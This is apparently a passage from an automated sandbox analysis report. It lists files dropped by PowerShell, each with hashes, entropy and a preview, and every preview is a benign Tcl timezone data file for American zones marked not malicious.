                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                              MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                              SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                              SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                              SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8920
                                                                                                                                                                                                                              Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                              SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                              SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                              SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8430
                                                                                                                                                                                                                              Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                              SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                              SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                              SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                              MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                              SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                              SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                              SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8600
                                                                                                                                                                                                                              Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                              SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                              SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                              SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                                              Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                              MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                              SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                              SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                              SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                              MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                              SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                              SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                              SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                              MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                              SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                              SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                              SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4578
                                                                                                                                                                                                                              Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                              MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                              SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                              SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                              SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                                              Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                              MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                              SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                              SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                              SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                                                              Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                              MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                              SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                              SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                              SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                              MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                              SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                              SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                              SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                              MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                              SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                              SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                              SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10353
                                                                                                                                                                                                                              Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                              MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                              SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                              SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                              SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7522
                                                                                                                                                                                                                              Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                              SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                              SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                              SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                              Malicious:false
